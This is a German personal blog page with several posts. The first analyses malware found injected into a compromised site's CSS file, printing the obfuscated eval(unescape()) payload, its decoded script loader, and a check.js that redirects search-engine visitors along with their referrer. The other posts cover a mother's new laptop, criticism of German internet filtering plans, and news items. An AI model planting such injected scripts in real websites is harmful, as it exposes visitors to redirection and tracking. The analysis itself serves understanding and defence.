Mitternachtshacking

Sehr spannend: Avast schlägt prompt Alarm, wenn man sich meinen letzten Beitrag (den mit dem Javascript-Schadcode) im Feed ankuckt:

Die Malware-Erkennung ist im übrigen korrekt, das ist das Javascript-Programm, das ich im letzten Beitrag beschrieben habe.  Dumm nur, dass ich das Programm lediglich im Text stehen habe, nicht in <script>-Tags. Es sollte daher auch nicht ausgeführt werden. Das Problem für einen Virenscanner ist allerdings, dass diese Unescape-Sequenz nicht nur in HTML-Dateien sondern in CSS-Files versteckt wird. Im Gegensatz dazu ist die Bytefolge sehr charakteristisch.

Ich denke daher, Avast hat lediglich ein Patternmatching auf die Unescape-Sequenz implementiert und schlägt daher immer Alarm wenn diese Folge auftaucht, egal ob ausführbares Skript oder nicht. Mein Antivir schlägt beim Zugriff auf infizierte Webseiten auch Alarm, nicht jedoch beim RSS-Feed.

(Danke Nikola, für die Zusendung des Screenshots)

Zur Zeit scheint es sich wieder zu häufen, dass Webseiten kompromittiert werden. Zumindest ist das mein persönlicher Eindruck wenn man so durch das Internet surft. Im Gegensatz zu früher findet man jedoch kaum noch Defacements, statt dessen werden CSS-Dateien möglichst unauffällig infiziert:

/* a0b4df006e02184c60dbf503e71c87ad */
body { margin-top: expression(
eval(unescape('
%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74
%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53
%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A
%53%53%32%20%3D%20%35%38%35%32%36%31%3B%20%4A%53%53
%33%20%3D%20%27%2F%6C%69%76%69%6E%67%2D%70%6C%61%6E
%65%74%2F%34%69%6D%61%67%65%73%2F%74%65%6D%70%6C%61
%74%65%73%2F%69%6E%65%67%69%62%65%2F%64%75%6D%6D%79
%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64
%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65
%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A
%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73
%72%63%27%2C%20%27%2F%6C%69%76%69%6E%67%2D%70%6C%61
%6E%65%74%2F%34%69%6D%61%67%65%73%2F%74%65%6D%70%6C
%61%74%65%73%2F%69%6E%65%67%69%62%65%2F%63%68%65%63
%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74
%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53
%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74
%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65
%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E
%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D
%3B%20
'))) }
/* a995d2cc661fa72452472e9554b5520c */

Wenn man den Hex-Code mittels Unescape dekodiert, findet man folgenden Javascript:

if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 585261; JSS3 = '/living-planet/4images/templates/inegibe/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/living-planet/4images/templates/inegibe/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };

Und in der Datei check.js dann die eigentliche Schadfunktion:

if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport| mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string| search_word|buscar|text|words|su|qt|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string| search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ){ location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2; };

Das Javascript-Segment prüft also meinen Referer und schickt den durch die Gegend. Für mich sieht das wie klassisches aber unauffälliges Ausspionieren aus. Sehr unfreundlich. Vielleicht sollte man den Betreiber des Servers www.sixstorms.de (Vorsicht beim Klicken!) warnen. Ich finde nur gerade keine Mailadresse. Eigentlich aber auch egal. Wer Firefox und Noscript verwendet ist vor dem Angriff geschützt, der Rest sind dann vermutlich Kollateralschäden.

Die setzen schon auf neueste Technologie da, bei der Post:

Schön, dass Mozilla die Version 2.x bereits abgekündigt und den letzten Patch veröffentlicht hat. Schnarchnasen bei der Schneckenpost. Alle.

Meine Mutter hat einen neuen Computer. Von einem großen Anbieter, der hauptsächlich direkt über seine Webseite verkauft. Bereits die Bestellung war ein Drama, da in den Nachrichten bekanntlich regelmäßig Horrormeldungen über Betrug im Internet verbreitet werden. Die Eingabe von Kreditkartendaten war für meine Mutter deshalb bereits eine große Überwindung. Nun ja, der Computer ist gestern angekommen.

Mein Telefon klingelt.

Ich: „Hallo?“
Sie: „Der Computer ist da, kannst du mal vorbeikommen?“

Ich: „Hast ihn schon ausgepackt?“
Sie: „Nein, das traue ich mich nicht. Kannst du nicht nachher herkommen und schauen, dass alles da ist?“

Ich seufze, vorsichtshalber unhörbar.

Ich: „Ja, aber erst nach sechs Uhr.“

Gesagt getan, pünktlich kurz nach sechs schlage ich bei meinen Eltern auf. Mein Vater hat den Computer inzwischen doch ausgepackt, ein Laptop mit schwarzer Hochglanzoberfläche. Meine Mutter rubbelt mit einem Tuch bereits die ersten Fingertapper weg.

Ich: „Gib mal her.“
Sie: „Moment, ich muss erst die Abdrücke wegmachen.“

Nach etwas hin und her bekomme ich den Computer, Windows XP, immerhin schon mit SP3 aber viele Updates fehlen trotzdem. Etwa 250 MB Updates später bekommt sie den Rechner zurück. Ich habe ihr einen Account, vorsichtshalber ohne Passwort angelegt. Man muss nur auf das Icon klicken. Danach wieder ausgeschaltet, sie soll ja mal alles eine machen.

Ich: „So, jetzt kannst du ihn mal testen.“

Sie hält das Gerät … nuja … nicht ganz richtig rum. Der Hersteller hat sein Firmenlogo so angebracht, dass es richtig steht wenn das Display ausgeklappt ist. Dafür muss es aber auf dem Kopf stehen zum Öffnen.

Sie: „Wo geht der denn auf?“
Ich: „andersrum.“

Sie schaut das Gerät von unten an, findet aber dann doch schnell raus, wie man das Display aufklappt und nach etwas drehen und suchen auch den Einschaltknopf direkt unterhalb des Displays.

Ich: „Dann mach mal …“
Sie: freudig „Der ist ja richtig schnell“

Ich: „Starte mal ein Programm.“
Sie: klickt auf Start „Wo ist denn da Programme?“ enttäuscht „Das sieht ja alles ganz anders aus.“

Ich vergaß … rechter Mausklick auf die Taskleiste, umstellen auf klassisches Startmenü, jetzt sieht das auch aus wie gewohnt.

Ich: „Probier’s nochmal.“
Sie: freudig „Ja, so kenn ich das“

Sie startet Word. Jetzt muss man wissen, dass sie bisher Word 2000 hatte und auf dem neuen Rechner eine Lizenz für Office 2007 Home dabei ist. Das sieht … nunja … etwas anders aus.

Sie: enttäuscht „Wie sieht das denn aus? Das ist ja alles ganz anders. Da muss ich mich ja ganz neu einarbeiten!“

Bevor ich was sagen kann hat sie Word schon wieder geschlossen.

Sie: „Dann spiele ich halt erstmal was.“ und startet Solitär.

In der Standardeinstellung deckt Solitär aber immer drei Karten auf einmal auf. Was man jedoch leicht umstellen könne …

Sie: wieder enttäuscht „Das sieht ja auch ganz anders aus. Das ist aber doof!“

Ich würde ihr das ja umstellen aber soweit komme ich gar nicht mehr. Bevor ich noch etwas sagen kann fährt sie den Computer runter.

Sie: „Das ist mir jetzt zu viel Arbeit. Das schaue ich mir nach Weihnachten nochmal an.“

Und jetzt atme ich erleichtert auf. Weihnachten ist mein Bruder auch mal wieder im Lande, dann darf er ihr gerne alles erklären. Den alten Rechner hat ja auch er für sie eingerichtet. Sie rubbelt mit dem Tuch die letzten Fingertapper weg und packt den Computer wieder ein.

Sie: „Ach ja, für den neuen Computer brauche ich auch noch eine neue E-Mail Adresse.“

Gerne. Das darf ihr auch mein Bruder einrichten. 🙂

Heute ist wieder ein schönes Beispiel, warum der Staat inzwischen die größte Gefahr für den Bürger ist:

• Weg frei für heimliche Online-Durchsuchungen
• Bundestag kann sich nicht auf Datenschutzkurs einigen

Dafür genügen inzwischen zwei Heise-Links.

Die schlimmsten Nazis sitzen in Norwegen und am MIT. Und bei meinem Provider sitzen auch lauter Nazis (man beachte die letzten beiden Byte der IP-Adresse die ich irgendwann mal zugewiesen bekam!). Zumindest wenn man dem Verfassungsschutz Brandenburg (PDF) glauben schenken kann. Was für ein Glück, dass ich nicht Konrad Zuse heiße.

Das wäre doch ein Thema für Herrn Schünemann … was man da alles sperren könnte.

(via Fefe)

Unsere Familienministerin von der Leyen gehört vermutlich auch zu den Ministern, die sich das Internet ausdrucken lassen. Anders kann ich mir die minderbemittelten Vorschläge von ihr, das Internet fleißig filtern zu wollen kaum erklären. Aber immerhin versucht sie noch, auf Zugangsebene zu filtern.

Noch dümmer ist der Vorschlag des niedersächsischen Innenministers Uwe Schünemann. Der völlig merkbefreite Minister will, dass Internetprovider ihre Kunden vertraglich verpflichten, Filtersoftware zu installieren die unanständige unerlaubte Inhalte filtern sollen. Vermutlich mit direkter Meldung der aufgerufenen URLs an die Gestapo die Stasi das BKA. Mal abgesehen von den technischen Problem (bitte einmal die Filtersoftware für OpenBSD und einmal für Solaris) ist das ein Eingriff in so viele Grundrechte, da lohnt es sich nichtmal drüber zu diskutieren. Das hat das Bundesverfassungsgericht schon kassiert, bevor der Schünemann seine Rücktrittsurkunde bekommen hat.

Bayern hat vor vielen Jahren mal Obdachlosen ein Einwegticket nach Norddeutschland bezahlt, mit etwas Taschengeld zur Motivation, damit die anderen Bundesländern auf der Tasche liegen. Vielleicht sollte man Herrn Schünemann ein Ticket nach China spendieren.

Noch lustiger sind jedoch Content Filter, die automatisch Fehler korrigieren wollen. Beispielsweise haben einige Amerikanische Seiten Filter installiert die anstößige Wörter automatisch austauschen. So wird aus dem US-Sprinter Tyson Gay halt der Sprinter Tyson Homosexual. In Deutschland gibt es so Spezialisten auch. Finanzen.net fügt automatisch Umlaute ein, wenn in der Titelzeile ue, oe oder ae in einem Wort auftaucht. Das sieht bei der Bauer AG dann lustig aus:

Aber vielleicht wäre das ja auch eine tolle Idee für Herrn Schünemann. Einfach alle Nackten auf Bildern im Internet gegen ein Foto von Frau Merkel austauschen und … bäh.

Ausreden für E-Mails, die man nicht empfangen oder lesen wollte gibt es wie Sand am Meer. Insbesondere der Spam-Filter wird sehr gerne genommen. Während früher der Hund die Hausaufgaben fraß, frisst heute der Spam-Filter die ungern angenommenen E-Mails. Elegant geflunkert am Telefon fällt das gar nicht besonders auf. Ich glaube ja, dass 80% der angeblich im Spam-Filter verschwundenen Geschäftsmails gar nicht dort verschwanden sondern einfach nicht gelesen wurden.

Egal … das Problem war auch eher, eine Ausrede zu finden, wenn man dummes Zeug in einer E-Mail geschrieben hatte und diese gerne zurückgenommen hätte. Rückrufe von E-Mails sind bekanntlich keine gute Idee. Aus diesem Dilemma erlöst uns jetzt zum Glück die moderne Wissenschaft:

Eine 44-jährige Frau, vermutlich unter Einfluss des Wirkstoffs Zolpidem hat schlafwandelnd ihren Computer eingeschaltet, ihr Passwort eingegeben und an Bekannte unsinnige E-Mails geschickt.

Zolpidem ist in vielen modernen Schlafmitteln enthalten, also die perfekte Ausrede … „diese E-Mail muss ich wohl schlafwandelnd geschrieben haben!“ 🙂

Klar, ein riesiges Werksgelände lässt sich kaum zuverlässig sichern aber gerade Kraftwerke sollten eigentlich gut gesichert sein. Nicht so in Großbritannien, offensichtlich. Da ist ein bisher unbekannter Mann in das Eon Kohlekraftwerk Kingsnorth eingedrungen und hat erfolgreich eine 500 MW Hauptturbine abgeschaltet. Das Kraftwerk selbst wurde bis auf den Ausfall nicht weiter beschädigt und konnte nach einigen Stunden wieder an’s Netz gehen.

Das interessante an diesem Vorfall ist, dass ein einzelner das geschafft hat. Kein großes Ops-Team, keine Unterstützung oder Ablenkung, kein Social Engineering … einfach über den Zaun (Alarmanlage?) in die Maschinenhalle hinein (Türschlösser?) und das System runtergefahren (Passwörter?).

Aus eigener Erfahrung mit großen Anlagen kann sich sagen, dass Türen meistens nicht abgeschlossen sind da im Notfall schnell jemand hinein muss. Auch Computersysteme sind oft nicht mit Passwörtern versehen, aus dem gleichen Grund, im Notfall muss sofort jemand ran können. Das ist ein bekanntes Problem in der Produktion und deshalb wird besonderen Wert auf die Außensicherung gelegt. Warum die hier nicht griff … keine Ahnung. Da werden sich die Betreiber ein paar kritische Fragen stellen lassen müssen.

Oder Eon hat halt mal an der falschen Stelle gespart.

Mich wundert das nicht.

(via Golem)